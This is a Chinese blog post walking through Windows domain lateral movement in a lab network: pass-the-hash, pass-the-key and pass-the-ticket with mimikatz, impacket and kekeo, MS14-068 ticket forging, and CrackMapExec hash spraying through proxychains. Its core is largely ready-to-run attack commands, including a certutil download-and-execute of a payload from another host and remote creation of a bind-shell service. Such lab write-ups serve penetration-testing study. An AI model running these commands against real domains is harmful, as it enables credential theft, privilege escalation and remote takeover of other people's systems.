【内网安全】 横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射

已于 2023-03-29 11:38:24 修改
阅读量1.1k 收藏 7
点赞数
分类专栏: # 内网渗透 文章标签: 安全 哈希算法 数据库 内网渗透
于 2023-03-27 15:11:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129788657
版权

文章目录

章节点

IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Plink,DCOM,Kerberos_TGS,GPO&DACL,
域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。

pass the ticket(票据传递攻击,简称ptt)
pass the key(密钥传递攻击,简称ptk)
PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
PTK(pass the key) #利用的ekeys aes256进行的渗透测试(NTLM认证攻击)
PTT(pass the ticket) #利用的票据凭证TGT进行渗透测试(Kerberos认证攻击)

域横向移动-PTH-Mimikatz&NTLM

概述

PTH = Pass The Hash
PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。
如果禁用了ntlm认证,PsExec无法利用获得的ntlm hash进行远程连接,但是使用mimikatz还是可以攻击成功。对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012等,可以使用AES keys代替NT hash来实现ptk攻击,
总结:KB2871997补丁后的影响
PTH:没打补丁用户都可以连接,打了补丁只能administrator连接
通过密码散列值 (通常是NTLM Hash)来进行攻击。
在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。
因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。另外注意在Window Server 2012 R2之前使用到的密码散列值是LM、NTLM,在2012 R2及其版本之后使用到的密码散列值是NTLM Hash。
详见:https://www.freebuf.com/column/220740.html

1、Mimikatz

mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c
net use \\192.168.3.32\c$
copy C:\Users\webadmin\Desktop\webserver4444.exe \\192.168.3.32\c$
sc \\sqlserver create bindshell binpath= "c:\webserver4444.exe"
sc \\sqlserver start bindshell

Mimikatz横向移动转发上线

2、impacket-at&ps&wmi&smb

psexec -hashes :NTLM值 域名/域用户@域内ip地址
smbexec -hashes :NTLM值 域名/域用户@域内ip地址
wmiexec -hashes :NTLM值 域名/域用户@域内ip地址

python3 psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32   #返回system权限
python3  smbexec.py -hashes :518b98ad4178a53695dc997aa02d455c /administrator@192.168.3.32	#返回system权限
python3  wmiexec.py -hashes :518b98ad4178a53695dc997aa02d455c /administrator@192.168.3.32	#返回administrator权限

在这里插入图片描述

certutil.exe -urlcache -split -f http://192.168.3.31:80/webserver4444.exe 1.exe & 1.exe

在这里插入图片描述
在这里插入图片描述
文件下载,执行上线,上图返回的权限不同是因为使用了不同的脚本

域横向移动-PTK-Mimikatz&AES256

概述

PTK = Pass The Key
PTK:打了补丁才能用户都可以连接,采用aes256连接
当系统安装了KB2871997补丁且禁用了NTLM的时候,
那我们抓取到的ntlm hash也就失去了作用,但是可以通过PTK的攻击方式获得权限。

mimikatz sekurlsa::ekeys

在这里插入图片描述

mimikatz sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值

mimikatz sekurlsa::pth /user:administrator /domain:god /aes256:9f64a722743a06840e2fc30e69c56c07feb23e32fc177d165f272cb5790ce98b

执行成功之后会在webserver靶机上弹出一个cmd窗口,但是无法使用net use \192.168.3.32\c$ 连接,对方机器未必会开启aes验证,也不满足漏洞利用条件

域横向移动-PTT-漏洞&Kekeo&Ticket

概述

pass the hash(hash传递攻击,简称pth)
PTT攻击的部分就不是简单的NTLM认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常见的攻击方法:MS14-068,Golden ticket,SILVER ticket,简单来说就是将连接合法的票据注入到内存中实现连接。
MS14-068基于漏洞,Golden ticket(黄金票据),SILVER ticket(白银票据)
其中Golden ticket(黄金票据),SILVER ticket(白银票据)属于权限维持技术
MS14-068造成的危害是允许域内任何一个普通用户,将自己提升至域管权限。微软给出的补丁是kb3011780。

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/kekeo/releases

1、漏洞-MS14-068(webadmin权限) 利用漏洞生成新用户(高权限)的票据

能否利用取决于域控DC是否打补丁

MS14-068是密钥分发中心(KDC)服务中的Windows漏洞,伪造用户身份TGT票据。
它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC。
Kerberos相当于web中的cookie或session用户凭证,用于用户身份验证
该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。
用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证.

下面演示使用webadmin普通用户权限利用MS14-068上线域控DC

shell whoami/user  #获取sid

在这里插入图片描述

shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!@#45  #生成票据文件		
#利用程序太大,不建议上传到webserver中,可能会有数据的丢失,使用代理的话需要将webserver提升到system权限

使用代码在本地执行,生成票据TGT_webadmin@god.org.ccache
在这里插入图片描述

shell klist purge				#清除票据

在这里插入图片描述

mimikatz kerberos::ptc TGT_webadmin@god.org.ccache		#使用mimikatz将票据(上传到目标主机上)导入内存

在这里插入图片描述
票据有效期是10个小时

#连接目标上线

shell dir \\OWA2010CN-GOD\c$		#未导入票据之前显示拒绝访问

在这里插入图片描述

#操作同上
shell net use \\OWA2010CN-GOD\C$
copy webserver4444.exe \\OWA2010CN-GOD\C$
sc \\OWA2010CN-GOD create bindshell binpath= "c:\webserver4444.exe"
sc \\OWA2010CN-GOD start bindshell

2、kekeo(高权限,需NTLM) 利用NTLM生成新的票据

利用取决于获取到的NTML是否是高权限用户的
因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,
我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗
缺点:票据是有有效期的,所以如果当前主机在连接过域控的话,有效期内可利用。

#生成票据  kekeo上传值webserver中
shell kekeo "tgt::ask /user:webadmin /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c" "exit"

在这里插入图片描述

#导入票据
shell kekeo "kerberos::ptt TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi" "exit"

在这里插入图片描述

#查看票据
shell klist
#利用票据连接
shell dir \owa2010cn-god\c$
这里显示拒绝访问
这种方法与上面同样是伪造票据,为什么不能使用呢,因为上面是利用MS14-068漏洞,而这里是正常生成凭证,只能在具有该用户的机器上使用。(比如演示中我们使用webadmin用户和对应hash,那么只能在具有该用户密码的机器上使用,比较鸡肋)
什么时候使用:当PTH功能条件受到限制(WMI、SMB协议不能正常利用),就可以利用该方法

3、mimikatz(需要高权限,需Ticket) 利用留在计算机内的票据

利用取决于当前主机有没有被目标(域控DC)登陆过(使用域控账号登陆)

mimikatz sekurlsa::tickets /export			#导出票据

在这里插入图片描述
桌面生成webserver与域内其他主机通讯的记录
在这里插入图片描述

mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;3e4]-2-0-60a00000-WEBSERVER$@krbtgt-GOD.ORG.kirbi

在这里插入图片描述
当然这个票据是无法利用域控DC的。因为该票据不是域控与webserver连接遗留的文件。因为我搭建环境的时候没使用域控账号登陆过webserver靶机,所以导不出可以利用的票据
在这里插入图片描述
登陆之后还是导不出administrator的票据的话,就使用DC域控远程桌面连接一下webserver靶机,使用administrator登陆,模拟一下利用条件
在这里插入图片描述
尝试使用域控DC登陆
重新导出票据 可以看到生成了administrator与域控的票据
在这里插入图片描述

mimikatz kerberos::ptt C:\Users\webadmin\Desktop\[0;f1818]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi		#导入票据  使用krbtgt协议的票据

在这里插入图片描述

shell klist

在这里插入图片描述

shell dir \\owa2010cn-god\c$

在这里插入图片描述

域横向移动-PTH-Proxychains&CrackMapExec

见往期文章复现
CrackMapExec

Github:https://github.com/Porchetta-Industries/CrackMapExec
官方手册:https://mpgn.gitbook.io/crackmapexec/
部分案例:https://www.freebuf.com/sectool/184573.html

下载对应release,建立socks连接,设置socks代理,配置规则,调用!
1、Linux Proxychains使用
代理配置:Proxychains.conf
代理调用:Proxychains 命令
2、密码喷射-域用户登录PTH:

proxychains python cme smb 192.168.3.21-32 -u user.txt -H 518b98ad4178a53695dc997aa02d455c #域用户HASH登录
proxychains python cme smb 192.168.3.21-32 -u administrator -H 518b98ad4178a53695dc997aa02d455c --local-auth #本地用户HASH登录

拓展:

黄金票据可以伪造域内任意用户,即使这个用户不存在,黑客入侵成功后,记下krbtgt的SID和krbtgt的散列值,即使蓝队修改了管理员密码,红队依然能通过黄金票据,畅通无阻。

今天是 几号
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】企业内网中的横向移动
HBohan的博客
08-25 1427
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。 中安网星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着网络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的网络安全环境。因而,深入了解攻击思路,“对症下药”,是目前网络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4147
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
机器学习&深度学习资料笔记&基本算法实现&资源整理.zip
最新发布
03-03
机器学习&深度学习资料笔记&基本算法实现&资源整理.zip 0.不调库系列 No free lunch. 线性回归 - logistic回归 - 感知机 - SVM(SMO) - 神经网络 决策树 - Adaboost kNN - 朴素贝叶斯 EM - HMM - 条件随机场 kMeans - PCA ROC曲线&AUC值 Stacking(demo) 计算IOU 参考:《机器学习》周志华 《统计学习方法》李航 1.机器学习&深度学习 工具 | 书籍 | 课程 | 比赛 | 框架 ---------|---------------|-------------|-------- |--------- Scikit-learn| 机器学习实战 | 机器学习/Andrew Ng | Kaggle | Keras ★ XGBoost | 集体智慧编程 | Deep Learning/Andrew Ng | 天池 | Tensorflow LightGBM | | | Biendata | PyTorch ★ Spark| | | AI challenge |Mxnet | | | | DataFountain | Caffe 2.自然语言处理 课程:自然语言处理班 - 七月在线 | CS224n 工具:NLTK | jieba | gensim | NLPIR | word2vec | LDA | BLEU(介绍、使用) 代码:社交网络语言re | 经典项目: funNLP AI写诗 对话系统DeepQA Awesome-Chinese-NLP NLP知识点整理>> 3.计算机视觉 常用代码 常用预处理:打乱数据集 | 计算图像均值方差 | 分类数据增强 | 检测数据增强 数据集相关:生成VOC目录结构 | 标签转xml写入 | coco txt转voc xml | 可视化VOC标签框 | 更新训练验证txt图片名 | VOC转csv格式 | 计算csv格式数据合适的anchor | labelme标注的人体17点json转COCO 常用算法:NMS | Mixup | label_smoothing | Weighted-Boxes-Fusion(NMS,WBF..) | mAP计算 | IOU计算 | YOLO F1 其他 课程: CS231n/Feifei Li 笔记: chinese-ocr项目 | 《深度卷积网络:原理与实践》读书笔记 | 手写汉字识别调研 经典分类网络: LeNet-5 | AlexNet | VGGNet | GoogleNet | ResNet | DenseNet | Xception | EfficientNet 经典检测网络: SSD(自己实现)| FasterRCNN | Yolo | CornerNet | CenterNet | EfficientDet 经典分割网络:Unet | DeepLab | 谷歌bodypix(走通了tfjs转onnx转tnn安卓部署的流程,但是实时精度不高) 经典项目: HyperLPR车牌识别 中文OCR1(YOLOv3+CRNN) 中文OCR2(CTPN + DenseNet) RFBNet(ECCV2018快速目标检测) AlphaPose(人体姿态估计) 轻量级性别年龄分类模型 图像风格迁移 超分辨率 Mask_RCNN人体关键点、分割 人像卡通化 移动端人脸检测1:libface | 移动端人脸检测2:Ultra Face 人脸识别facenet-tf(2018) | 人脸识别facenet-pth(2018) | AdaFace(2022) 人脸关键点pth版 CV知识点整理>> 4.数据挖掘 笔记:特征工程 常见数学、机器学习知识点整理>> 5.其他 资源索引
Recommend-System:推荐系统实现&FunkSVD
03-12
In [1]: from recommender import Recommender In [2]: rec = Recommender() In [3]: rec.fit(reviews_pth='train_data.csv', movies_pth= 'movies_clean.csv', learning_rate=.01, iters=10) Optimizaiton Statistics Iterations | Mean Squared Error 1 12.104043 2 5.437694 3 3.239180 4 2.105978 5 1.428226 6 0.999180 7 0.718810 8 0.530387 9 0.400264 10 0.308054 In [4]: rec.predict_rat
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
2.mimikatz # kerberos::purge 3.利用 ms14-068 生成 TGT 数据 4.票据注入内存 5.查看凭证列表 klist 6.利
pth-toolkit:传递哈希工具集合的修改版本可以直接开箱即用
06-26
pth-工具包 传递哈希工具集合的修改版本设计为便携,即使在最“裸露的骨骼”系统上也可以直接开箱即用 master 分支是为 amd64 编译的,最终目标是将这些工具交叉编译到所有可能的架构 目前,此 repo 提供以下修补工具/实用程序: winexe 微信 管理系统 客户端 客户端 获取 网 要求 sh 所有工具都在只有base包的裸机 Arch linux 安装上进行了测试。 这什么时候有用? 当您使用自定义渗透测试操作系统并且您不想自己经历编译和修补这些工具的痛苦时 用于从受感染的 *nix 主机转向 Windows 框/域的后利用! 只需克隆这个 repo 或下载 tarball 就可以传递所有的哈希值了!
内网横向移动PTH哈希&PTT票据&PTK密匙&Kerberos
剁椒鱼头没剁椒的博客
07-17 1179
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码
PTT(pass the ticket)票据传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
11-03 2010
PTT票据传递攻击,(PTT)是一种使用Kerberos票据代替明文密码或NTLM哈希的方法。PTH基于NTLM认证进行攻击,而PTT基于kerberos协议进行攻击票据传递攻击,目的是伪造、窃取凭据提升权限。
内网安全第一百三十天
B_l_a_nk的博客
08-02 196
1、横向移动-PTH-NTLM 2、横向移动-PTK-AES256 3、横向移动-PTT-漏洞&内存
票据传递攻击
qq_56426046的博客
11-12 924
Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在KDC 中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造TGT和Logon Session Key 来进入下一步 Client 与 TGS 的交互。白银票据的利用过程是伪造TGS,通过已知的授权服务密码生成一张可以访问该服务的TGT。
电源技术中的德州仪器推出首款50及60A POLA™电源模块
12-02
 新型50 A PTH12040 与60 A PTH04040插入式电源模块进一步壮大了已广受青睐的TI PTHxx非隔离式模块的产品阵营,后者不仅将各种输入电压进行了组合,并集成了Auto-Track排序技术。这种独特的Auto-Track功能...
什么是密码喷洒攻击
weixin_40191861的博客
04-04 334
密码喷洒攻击针对许多不同的账户、服务和组织尝试使用一个或两个通用密码,以此避免在单个账户上被检测或锁定。攻击者使用这种方法避免超过设定的账户锁定阈值,许多组织经常设置为输错三到五次就锁住账户。只要在锁定阈值内输对密码,攻击者可以在整个组织成功尝试多个密码,不会被活动目录中的默认保护机制阻止。攻击者选择最终用户常用的密码和数学公式来猜测密码,或使用已在密码泄露网站上公布的泄露密码。用户在设置密码时要求用户使用特殊字符和字母数字组合,并限制最小长度。使用随机数时,要确保用户无法获取随机数生成算法。
域渗透-横向移动(PTH)
m0_58606546的博客
11-20 262
一:Windows本地认证 ***基础知识*** Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,域内用户的密码hash是存在域控的NTDS.DIT文件里面。 SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。 ***密码格式*** Administrator:500:AAD3B435B5
实力吊打国家黑客:从密码喷洒到完全控制网络只需几天
smellycat000的专栏
06-23 958
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队微软发布报告,详述了复杂的黑客组织如何能在不到一周的时间里,通过密码喷洒攻击一路完全控制网络。微软威胁防护情报团队指出,“每...
如何通过审计安全事件日志检测密码喷洒(Password Spraying)攻击
weixin_33726313的博客
05-28 445
许多渗透测试人员和攻击者通常都会使用一种被称为“密码喷洒(Password Spraying)”的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破...
内网渗透-PTH&PTT&PTK
G208_522的博客
10-26 1148
内网渗透系列
内网安全PTH PTK PTT
qq_61553520的博客
01-28 1327
​​​​​​​。
内网安全 - 域横向 PTH&PTK&PTT
acepanhuan的博客
03-16 358
内网安全 - 域横向 PTH&PTK&PTT
内网横向PTH&PTK&PTT哈希票据传递
mingyqf的博客
11-12 3913
内网横向PTH&PTK&PTT哈希票据传递 Kerberos 协议具体工作方法,在域中,简要介绍一下:  客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用 krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检 测,成功之后创建 TGT(Ticket-Granting Ticket)  将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据  然后客户机将 TGT 发送给域控
pth文件
05-25
.pth文件是PyTorch中模型的保存格式,它包含了PyTorch模型的权重参数和网络结构等信息。.pth文件可以用来恢复训练好的模型,或者在其他程序中加载已经训练好的模型,进行预测或fine-tuning等操作。 在PyTorch中,可以使用`torch.save()`函数将模型保存为.pth文件,例如: ```python import torch # 定义模型 model = ... # 保存模型 torch.save(model.state_dict(), 'my_model.pth') ``` 其中,`model.state_dict()`返回模型的所有权重参数,`'my_model.pth'`是保存的文件名。 要加载.pth文件中的模型,可以使用`torch.load()`函数,例如: ```python import torch # 加载模型 model_state_dict = torch.load('my_model.pth') model = ... # 将权重参数加载到模型中 model.load_state_dict(model_state_dict) ``` 其中,`model`是定义好的模型,`model.load_state_dict()`函数将.pth文件中的权重参数加载到模型中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值